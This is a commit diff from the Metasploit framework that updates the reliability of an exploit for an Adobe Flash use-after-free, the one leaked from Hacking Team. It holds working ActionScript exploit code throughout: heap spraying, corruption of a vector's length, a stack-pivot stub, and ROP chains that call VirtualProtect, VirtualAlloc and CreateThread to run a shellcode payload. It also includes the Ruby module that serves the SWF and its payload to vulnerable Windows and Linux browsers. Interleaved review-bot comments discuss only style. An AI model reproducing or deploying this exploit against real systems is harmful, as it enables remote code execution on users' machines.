Land #5732, reliability update for adobe_flash_hacking_team_uaf

wchen-r7 2015-07-17 16:43:39 -05:00
commit 7113c801b1
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
7 changed files with 144 additions and 213 deletions



@ -1,3 +1,4 @@
// Build with Flex SDK 4.6 + AIR 3.1
package
{
import flash.display.Sprite
@ -8,22 +9,20 @@ package
public class Exploit extends Sprite
{
private var b64:Base64Decoder = new Base64Decoder()
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
public function Exploit():void
{
//trace("Got to checkpoint 0");
if (stage) init();
else addEventListener(Event.ADDED_TO_STAGE, init);
}
public function Exploit():void
{
//trace("Got to checkpoint 0");
if (stage) init();
else addEventListener(Event.ADDED_TO_STAGE, init);
}
private function init(e:Event = null):void
{
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
@ -31,7 +30,8 @@ package
payload = b64.toByteArray()
removeEventListener(Event.ADDED_TO_STAGE, init);
MyClass.TryExpl(this, platform, os, payload)
Logger.log('TryExpl...')
MyClass.TryExpl(this, platform, payload)
}
}
}
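Review bot: The new `Logger.log('TryExpl...')` line inserted before the `MyClass.TryExpl` call is the only single-quoted string literal in the changed ActionScript, while every other log message in this commit uses double quotes; for consistency write `Logger.log("TryExpl...")`. The `b64` field and the `Exploit()` constructor appear twice in this rendering with identical text, which reads as an indentation-only change, so the call site is the only substantive edit in this section.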


@ -11,27 +11,33 @@ package
private var eba:ExploitByteArray
private var payload:ByteArray
private var platform:String
private var op_system:String
private var pos:uint
private var byte_array_object:uint
private var main:uint
private var stack_object:uint
private var payload_space_object:uint
private var buffer_object:uint
private var magic:uint
private var magic_arg0:uint
private var magic_arg1:uint
private var magic_object:uint
private var magic_table:uint
private var buffer:uint
private var vtable:uint
private var stack_address:uint
private var payload_address:uint
private var stub_address:uint
private var stub_space_object:uint
private var stub:Vector.<uint> = new Vector.<uint>(8)
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
private var spray:Vector.<Object> = new Vector.<Object>(90000)
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
{
exploit = exp
payload = p
platform = pl
op_system = os
ev = new ExploitVector(uv, uv_length)
if (!ev.is_ready()) return
@ -49,9 +55,18 @@ package
cleanup()
}
static function Magic(...a){}
private function spray_objects():void
{
Logger.log("[*] Exploiter - spray_objects()")
// mov eax,[esp+0x4]
// xchg eax,esp
// rets
stub[0] = 0x0424448B
stub[1] = 0x0000C394
for (var i:uint = 0; i < spray.length; i++)
{
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@ -59,6 +74,8 @@ package
spray[i][1] = exploit
spray[i][2] = stack
spray[i][3] = payload_space
spray[i][4] = Magic
spray[i][5] = stub
}
}
@ -76,6 +93,8 @@ package
main = ev.at(pos + 1) - 1
stack_object = ev.at(pos + 2) - 1
payload_space_object = ev.at(pos + 3) - 1
magic = ev.at(pos + 4) - 1
stub_space_object = ev.at(pos + 5) - 1
if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
return false
}
@ -98,6 +117,11 @@ package
vtable = ev.read(main)
stack_address = ev.read(stack_object + 0x18)
payload_address = ev.read(payload_space_object + 0x18)
stub_address = ev.read(stub_space_object + 0x18)
magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
magic_table = ev.read(magic_object)
magic_arg0 = ev.read(magic + 0x1c)
magic_arg1 = ev.read(magic + 0x20)
}
private function corrupt_byte_array():void
@ -138,13 +162,7 @@ package
if (platform == "linux") {
do_rop_linux()
} else if (platform == "win") {
if (op_system == "Windows 8.1") {
do_rop_windows8()
} else if (op_system == "Windows 7") {
do_rop_windows()
} else {
return
}
do_rop_windows()
} else {
return
}
@ -167,88 +185,20 @@ package
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
// Put the fake stack on memory
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
}
private function do_rop_windows8():void
{
Logger.log("[*] Exploiter - do_rop_windows8()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var advapi32:uint = pe.module("advapi32.dll", flash)
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
var createthread:uint = pe.procedure("CreateThread", kernelbase)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
@ -257,14 +207,14 @@ package
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
@ -273,13 +223,31 @@ package
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
for (var i:uint; i < 0x100; i++) {
eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
}
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
// VirtualProtect the stub with a *reliable* stackpivot
eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stub_address)
eba.write(magic + 0x20, 0x10)
var args:Array = new Array(0x41)
Magic.call.apply(null, args);
// Call to our stackpivot and init the rop chain
eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stack_address + 0x18000)
Magic.call.apply(null, null);
eba.write(magic_object, magic_table);
eba.write(magic + 0x1c, magic_arg0)
eba.write(magic + 0x20, magic_arg1)
}
private function do_rop_linux():void
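Review bot: The comments on the first two rewritten `eba.write` lines of the continuation stub still read `// mov eax, vtable` and `// mov ebx, main`, but their operands were changed to `magic_table` and `magic_object`; update them to `// mov eax, magic_table` and `// mov ebx, magic_object` so they agree with the restore writes at the end of the function. The new copy loop `for (var i:uint; i < 0x100; i++)` relies on the implicit zero default of `uint`, whereas the `spray_objects` loop in the same file writes `var i:uint = 0`; an explicit initializer keeps the two consistent. The identical text also appears in the vendored `external/source/flash_exploiter/Exploiter.as` copy in this commit. `do_rop_windows` begins before its hunk.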


@ -12,6 +12,7 @@
_gc:Array,
_va:Array,
_ba:ByteArray,
_corrupted:Vector.<uint>,
_isDbg:Boolean = Capabilities.isDebugger;
// define malicious valueOf()
@ -34,7 +35,7 @@
}
// try to corrupt the length value of Vector.<uint>
static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray) : Boolean
static function TryExpl(e:Exploit, platform:String, payload:ByteArray) : Boolean
{
Logger.log("tryexpl")
try
@ -55,7 +56,6 @@
}
// find these pages
var v:Vector.<uint>;
for(i=alen-5; i >= 0; i-=3)
{
// take next allocated ByteArray
@ -67,17 +67,22 @@
if (_ba[3] != 0) throw new Error("can't cause UaF");
// check results // find corrupted vector
for(var j:int=0; j < _va.length; j++){
v = _va[j];
if (v.length != 0x3f0) {
Logger.log("v.length = 0x" + v.length.toString(16));
var exploiter:Exploiter = new Exploiter(e, platform, os, payload, v, 0x3f0)
Logger.log("v.length = 0x" + v.length.toString(16));
return true
for (var j:int = 0; j < _va.length; j++) {
if (_va[j].length != 0x3f0) {
_corrupted = _va[j]
} else {
delete(_va[j])
_va[j] = null
}
}
if (_corrupted != null) {
Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));
var exploiter:Exploiter = new Exploiter(e, platform, payload,_corrupted, 0x3f0)
Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));
return true
}
}
Logger.log("bad allocation. try again.");
}
catch (e:Error)
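Review bot: In the new scan over `_va`, `delete(_va[j])` immediately followed by `_va[j] = null` clears the same slot twice; `_va[j] = null` alone is the clearer form. The two identical `Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));` lines bracketing the `new Exploiter(...)` call look like a before/after trace, and a short comment such as `// logged twice on purpose: length before/after Exploiter runs` would tell the next reader that the repetition is intentional. `TryExpl` continues outside the hunk.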


@ -25,13 +25,11 @@ package
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
private var exploiter:Exploiter
public function Exploit()
{
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
@ -42,7 +40,7 @@ package
The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
*/
exploiter = new Exploiter(this, platform, os, payload, uv, 0x13e)
exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
}
}
}

external/source/flash_exploiter/Exploiter.as vendored Normal file → Executable file

@ -11,27 +11,33 @@ package
private var eba:ExploitByteArray
private var payload:ByteArray
private var platform:String
private var op_system:String
private var pos:uint
private var byte_array_object:uint
private var main:uint
private var stack_object:uint
private var payload_space_object:uint
private var buffer_object:uint
private var magic:uint
private var magic_arg0:uint
private var magic_arg1:uint
private var magic_object:uint
private var magic_table:uint
private var buffer:uint
private var vtable:uint
private var stack_address:uint
private var payload_address:uint
private var stub_address:uint
private var stub_space_object:uint
private var stub:Vector.<uint> = new Vector.<uint>(8)
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
private var spray:Vector.<Object> = new Vector.<Object>(90000)
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
{
exploit = exp
payload = p
platform = pl
op_system = os
ev = new ExploitVector(uv, uv_length)
if (!ev.is_ready()) return
@ -49,9 +55,18 @@ package
cleanup()
}
static function Magic(...a){}
private function spray_objects():void
{
Logger.log("[*] Exploiter - spray_objects()")
// mov eax,[esp+0x4]
// xchg eax,esp
// rets
stub[0] = 0x0424448B
stub[1] = 0x0000C394
for (var i:uint = 0; i < spray.length; i++)
{
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@ -59,6 +74,8 @@ package
spray[i][1] = exploit
spray[i][2] = stack
spray[i][3] = payload_space
spray[i][4] = Magic
spray[i][5] = stub
}
}
@ -76,6 +93,8 @@ package
main = ev.at(pos + 1) - 1
stack_object = ev.at(pos + 2) - 1
payload_space_object = ev.at(pos + 3) - 1
magic = ev.at(pos + 4) - 1
stub_space_object = ev.at(pos + 5) - 1
if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
return false
}
@ -98,6 +117,11 @@ package
vtable = ev.read(main)
stack_address = ev.read(stack_object + 0x18)
payload_address = ev.read(payload_space_object + 0x18)
stub_address = ev.read(stub_space_object + 0x18)
magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
magic_table = ev.read(magic_object)
magic_arg0 = ev.read(magic + 0x1c)
magic_arg1 = ev.read(magic + 0x20)
}
private function corrupt_byte_array():void
@ -138,13 +162,7 @@ package
if (platform == "linux") {
do_rop_linux()
} else if (platform == "win") {
if (op_system == "Windows 8.1") {
do_rop_windows8()
} else if (op_system == "Windows 7") {
do_rop_windows()
} else {
return
}
do_rop_windows()
} else {
return
}
@ -167,88 +185,20 @@ package
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
// Put the fake stack on memory
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
}
private function do_rop_windows8():void
{
Logger.log("[*] Exploiter - do_rop_windows8()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var advapi32:uint = pe.module("advapi32.dll", flash)
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
var createthread:uint = pe.procedure("CreateThread", kernelbase)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
@ -257,14 +207,14 @@ package
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
@ -273,13 +223,31 @@ package
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
for (var i:uint; i < 0x100; i++) {
eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
}
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
// VirtualProtect the stub with a *reliable* stackpivot
eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stub_address)
eba.write(magic + 0x20, 0x10)
var args:Array = new Array(0x41)
Magic.call.apply(null, args);
// Call to our stackpivot and init the rop chain
eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stack_address + 0x18000)
Magic.call.apply(null, null);
eba.write(magic_object, magic_table);
eba.write(magic + 0x1c, magic_arg0)
eba.write(magic + 0x20, magic_arg1)
}
private function do_rop_linux():void


@ -21,6 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
},
@ -68,8 +69,6 @@ class Metasploit3 < Msf::Exploit::Remote
:flash => lambda do |ver|
case target.name
when 'Windows'
# Note: Chrome might be vague about the version.
# Instead of 18.0.0.203, it just says 18.0
return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
@ -105,12 +104,6 @@ class Metasploit3 < Msf::Exploit::Remote
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
print_warning("Target setup not supported")
send_not_found(cli)
return
end
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
@ -125,7 +118,6 @@ class Metasploit3 < Msf::Exploit::Remote
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
@ -138,9 +130,9 @@ class Metasploit3 < Msf::Exploit::Remote
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
</object>
</body>
</html>
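Review bot: The new description entry `Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and` is the only target line without a browser version, while the neighbouring Windows 7 entry names `Firefox 38.0.5`; record the version that was actually tested, e.g. `Firefox <TESTED-VERSION>`. Removing the `# Note: Chrome might be vague about the version.` comment leaves the remaining `return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')` line without its rationale for short `18.0`-style strings; if that tolerance is still intended, keep a one-line comment stating it. The `on_request_exploit` method and the HTML template continue outside their hunks.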